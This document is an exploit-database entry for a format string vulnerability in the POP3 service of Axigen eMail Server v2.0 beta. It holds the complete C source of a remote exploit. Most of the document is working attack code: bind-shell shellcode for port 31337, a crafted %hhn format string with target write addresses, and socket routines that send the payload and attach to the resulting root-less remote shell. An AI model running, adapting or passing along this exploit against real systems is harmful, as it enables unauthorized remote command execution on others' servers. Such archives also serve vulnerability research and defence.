Remote Shell Format String Vulnerability in Axigen eMail Server v2.0 (beta)

vendor:

Axigen eMail Server

by:

fuGich

7.5

CVSS

HIGH

Format String Vulnerability

134

CWE

Product Name: Axigen eMail Server

Affected Version From: Axigen eMail Server v2.0 (beta)

Affected Version To: Axigen eMail Server v2.0 (beta)

Patch Exists: NO

Related CWE: CVE not provided

CPE: a:axigen:axigen_email_server:2.0

Other Scripts:

Platforms Tested:

2006

Remote Shell Format String Vulnerability in Axigen eMail Server v2.0 (beta)

This exploit takes advantage of a format string vulnerability in the pop3 service of Axigen eMail Server v2.0 (beta) to execute /bin/sh and bind to port 31337. The exploit uses an optimised format string generated with libforSC, using hhn for writes. The logType for the pop3 service must be set to "system" and the logLevel must have the 4th bit set.

Mitigation:

Update to a patched version of Axigen eMail Server.

Source

Exploit-DB raw data:

/* axiagen.c
 *
 * Axigen eMail Server v2.0 (beta)
 * 	by fuGich Tue Dec 5 2006
 *
 * 		thanks to mu-b
 *
 * - Tested on: Axigen V2 (beta)
 *
 *   logType for the pop3 service must be "system" and 
 *   the logLevel set to any number with 4th bit set
 *
 * remote shell format string vulnerability in pop3
 * 	/bin/sh to bind to port 31337
 *
 * optimised format string generated with libforSC
 * used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>


#define DEF_PORT    110
#define PORT_POP3   DEF_PORT


char formatString[] =
	
	// plt fixup code

	"\xba\xd8\xbe\x85\x09"		// mov    $0x985bed8,%edx
	"\xc7\x02\x9a\xf0\x04\x08"	// movl   $0x804f09a,(%edx)
	"\x8d\x52\x04"			// lea    0x4(%edx),%edx
	"\xc6\x02\xaa"			// movb   $0xaa,(%edx)
	"\x90\x90\x90"			// make divisible by 8
	
	//
	// bind shell with fork to port 31337 98 bytes
	//

	"\x6a\x66"              // push $0x66 
	"\x58"                  // pop %eax 
	"\x99"                  // cltd 
	"\x6a\x01"              // push $0x1 
	"\x5b"                  // pop %ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\x6a\x02"              // push $0x2 

	//
	// <_doint>:
	//

	"\x89\xe1"              // mov %esp,%ecx 
	"\xcd\x80"              // int $0x80 

	"\x5b"                  // pop %ebx 
	"\x5d"                  // pop %ebp 
	"\x52"                  // push %edx 
	"\x66\xbd\x69\x7a"      // mov $0x7a69,%bp (0x7a69 = 31337)
	"\x0f\xcd"              // bswap %ebp 
	"\x09\xdd"              // or %ebx,%ebp 
	"\x55"                  // push %ebp 
	"\x6a\x10"              // push $0x10 
	"\x51"                  // push %ecx 
	"\x50"                  // push %eax 
	"\x89\xe1"              // mov %esp,%ecx 
	"\xb0\x66"              // mov $0x66,%al 
	"\xcd\x80"              // int $0x80 
	"\xb3\x04"              // mov $0x4,%bl 
	"\xb0\x66"              // mov $0x66,%al 
	"\xcd\x80"              // int $0x80 

	//
	// <_acceptloop>:
	//

	"\x5f"                  // pop %edi 
	"\x50"                  // push %eax 
	"\x50"                  // push %eax 
	"\x57"                  // push %edi 
	"\x89\xe1"              // mov %esp,%ecx 
	"\x43"                  // inc %ebx 
	"\xb0\x66"              // mov $0x66,%al 
	"\xcd\x80"              // int $0x80 
	"\x93"                  // xchg %eax,%ebx 
	"\xb0\x02"              // mov $0x2,%al 
	"\xcd\x80"              // int $0x80 
	"\x85\xc0"              // test %eax,%eax 
	"\x75\x1a"              // jne <_parent> 
	"\x59"                  // pop %ecx 

	//
	// <_dup2loop>:
	//

	"\xb0\x3f"              // mov $0x3f,%al 
	"\xcd\x80"              // int $0x80 
	"\x49"                  // dec %ecx 
	"\x79\xf9"              // jns <_dup2loop> 

	"\xb0\x0b"              // mov $0xb,%al 
	"\x68\x2f\x2f\x73\x68"  // push $0x68732f2f 
	"\x68\x2f\x62\x69\x6e"  // push $0x6e69622f 
	"\x89\xe3"              // mov %esp,%ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\xeb\xb2"              // jmp <_doint> 

	//
	// <_parent>:
	//

	"\x6a\x06"              // push $0x6 
	"\x58"                  // pop %eax 
	"\xcd\x80"              // int $0x80 
	"\xb3\x04"              // mov $0x4,%bl 
	"\xeb\xc9"              // jmp <_acceptloop>

	//
	// 9 write addresses
	//

	"\xd8\xbe\x85\x09"	// pointer @ 0x0985bed8
	"\xd9\xbe\x85\x09"
	"\xda\xbe\x85\x09"
	"\xdb\xbe\x85\x09"
	"\xe0\xbe\x85\x09"	// place shell code @ 0x0985bee0
	"\xe1\xbe\x85\x09"
	"\xe2\xbe\x85\x09"
	"\xe3\xbe\x85\x09"
	"\xe4\xbe\x85\x09"

	// add the format string

	"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n";


static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);

void shell (int sock){		/* Attach to Remote Shell */

	int     l;
	char    buf[512];
	fd_set  rfds;

	while (1) {
		FD_SET (0, &rfds);
		FD_SET (sock, &rfds);
		select (sock + 1, &rfds, NULL, NULL, NULL);
		if (FD_ISSET (0, &rfds)) {
			l = read (0, buf, sizeof (buf));
			if (l <= 0) {
				printf("\n - Connection closed by local user\n");
				exit (EXIT_FAILURE);
			}
			write (sock, buf, l);
		}
		if (FD_ISSET (sock, &rfds)) {
			l = read (sock, buf, sizeof (buf));
			if (l == 0) {
				printf ("\n - Connection closed by remote host.\n");
				exit (EXIT_FAILURE);
			} else if (l < 0) {
				printf ("\n - Read failure\n");
				exit (EXIT_FAILURE);
			}
			write (1, buf, l);
		}
	}
}

static int sock_send (int sock, u_char * src, int len){		/* send data to the open socket */

	int sbytes;
	sbytes = send (sock, src, len, 0);
	return (sbytes);
}

static int sockami (u_char * host, int port){	/* create the socket */

	struct sockaddr_in address;
	struct hostent *hp;
	int sock;

	fflush (stdout);
	if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
		perror ("socket()");
		exit (-1);
	}

	if ((hp = gethostbyname (host)) == NULL){
		perror ("gethostbyname()");
		exit (-1);
	}

	memset (&address, 0, sizeof (address));
	memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
	address.sin_family = AF_INET;
	address.sin_port = htons (port);

	if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
		perror ("connect()");
		exit (EXIT_FAILURE);
	}
	return (sock);
}

static void formatme (u_char * host){	/* do the evil */

	int sock;
	printf ("+Connecting to %s:%d ", host, PORT_POP3);	
	sock = sockami (host, PORT_POP3);
	printf ("\n+Sending format string\n");
	sock_send (sock, formatString, strlen (formatString));
	fflush (stdout);
	sleep(2);	
	printf ("+Connecting to Shell ");	
	sock = sockami (host, 31337);
	printf ("- Done\n");
	shell(sock);

}

int main (int argc, char **argv){	/* go figure */

	printf ("Axigen 2.0 beta Remote pop3 exploit\n"
		"by: <fuGich@gmail.com>\n\n");

	if (argc <= 1)
	{
		fprintf (stderr, "Usage: %s <host>\n\n", argv[0]);
		exit (EXIT_SUCCESS);
	}

	formatme (argv[1]);
}

// milw0rm.com [2007-02-18]